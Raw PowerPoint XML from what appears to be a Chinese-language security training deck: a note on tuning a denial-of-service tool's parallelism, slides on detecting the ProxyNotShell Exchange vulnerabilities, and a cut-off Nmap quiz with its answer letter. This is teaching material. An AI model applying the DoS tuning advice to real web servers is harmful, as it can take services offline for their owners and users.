          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="圖片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3471862" y="1238850"/>
            <a:ext cx="5342931" cy="2866425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5823348" y="4105275"/>
            <a:ext cx="2991445" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1350" dirty="0"/>
              <a:t>Please note that the number of concurrent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1350" dirty="0" err="1"/>
              <a:t>connexions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1350" dirty="0"/>
              <a:t> must be defined with the --max-parallelism option (default is 20, suggested is 400 or more) Also, be advised that in some cases this attack can bring the web server down for good, not only while the attack is running.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="投影片編號版面配置區 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D16C3A51-89D0-4E4D-AA61-5A30A561532A}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>52</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3279226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D16C3A51-89D0-4E4D-AA61-5A30A561532A}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>53</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="94263" y="274898"/>
            <a:ext cx="8702075" cy="507831"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2700" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>漏洞檢測</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2700" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>:Exchange Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2700" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>伺服器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2700" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>|CVE-2022-41082</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="圖片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="303640" y="2604952"/>
            <a:ext cx="3876119" cy="3374231"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="109346" y="770965"/>
            <a:ext cx="8374000" cy="300082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1350" dirty="0" err="1"/>
              <a:t>ProxyNotShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0"/>
              <a:t>是越南安全業者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1350" dirty="0"/>
              <a:t>GTSC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0"/>
              <a:t>揭露，是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1350" dirty="0"/>
              <a:t>CVE-2022-41082</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0"/>
              <a:t>及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1350" dirty="0"/>
              <a:t>CVE-2022-41040</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0"/>
              <a:t>這</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1350" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0"/>
              <a:t>個漏洞的合稱</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228020" y="1153674"/>
            <a:ext cx="8568318" cy="577081"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1050" dirty="0"/>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1050" dirty="0"/>
              <a:t>萬臺</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1050" dirty="0"/>
              <a:t>Exchange Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1050" dirty="0"/>
              <a:t>仍未修補</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1050" dirty="0" err="1"/>
              <a:t>ProxyNotShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1050" dirty="0"/>
              <a:t>漏洞    文</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1050" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1050" dirty="0"/>
              <a:t>林妍溱 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1050" dirty="0"/>
              <a:t>| 2023-01-04</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1050" dirty="0"/>
              <a:t>發表    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1050" dirty="0"/>
              <a:t>https://www.ithome.com.tw/news/154989</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1050" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1050" dirty="0"/>
              <a:t>微軟在去年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1050" dirty="0"/>
              <a:t>11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1050" dirty="0"/>
              <a:t>月</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1050" dirty="0"/>
              <a:t>Patch Tuesday</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1050" dirty="0"/>
              <a:t>完整修補由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1050" dirty="0"/>
              <a:t>CVE-2022-41082</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1050" dirty="0"/>
              <a:t>及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1050" dirty="0"/>
              <a:t>CVE-2022-41040</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1050" dirty="0"/>
              <a:t>組成的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1050" dirty="0" err="1"/>
              <a:t>ProxyNotShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1050" dirty="0"/>
              <a:t>漏洞後，安全研究人員在今年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1050" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1050" dirty="0"/>
              <a:t>月</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1050" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1050" dirty="0"/>
              <a:t>日進行網路掃瞄發現，全球仍有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1050" dirty="0"/>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1050" dirty="0"/>
              <a:t>萬多臺</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1050" dirty="0"/>
              <a:t>Exchange Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1050" dirty="0"/>
              <a:t>伺服器因尚未更新版本而曝險</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228020" y="2327953"/>
            <a:ext cx="3539943" cy="300082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1350" dirty="0"/>
              <a:t>https://github.com/Diverto/nse-exchange</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="圖片 10"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="904"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4295775" y="3783124"/>
            <a:ext cx="4176713" cy="2022602"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="圖片 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4295776" y="2390018"/>
            <a:ext cx="3139124" cy="1354938"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40091650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D16C3A51-89D0-4E4D-AA61-5A30A561532A}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>54</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3" name="表格 2"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1557451165"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="108013" y="420307"/>
          <a:ext cx="8855393" cy="6035040"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="380048">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1768411634"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="405765">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2584082660"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="8069580">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3210005248"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="1303020">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>D</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="14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TW" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>1.</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="14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TW" altLang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>關於 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>Nmap</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>工具之指令操作，下列敘述何者正確？</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>(A) Nmap</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>的 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>SYN</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>掃描可以掃描 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>UDP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>埠</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>(B) Nmap</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>使用 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>-T1</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>參數較 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>-T4</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>參數的掃描速度快</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>(C) Nmap</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>使用 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>sO</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>參數可檢測標的主機的作業系統版本</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>(D) Nmap</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>使用 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
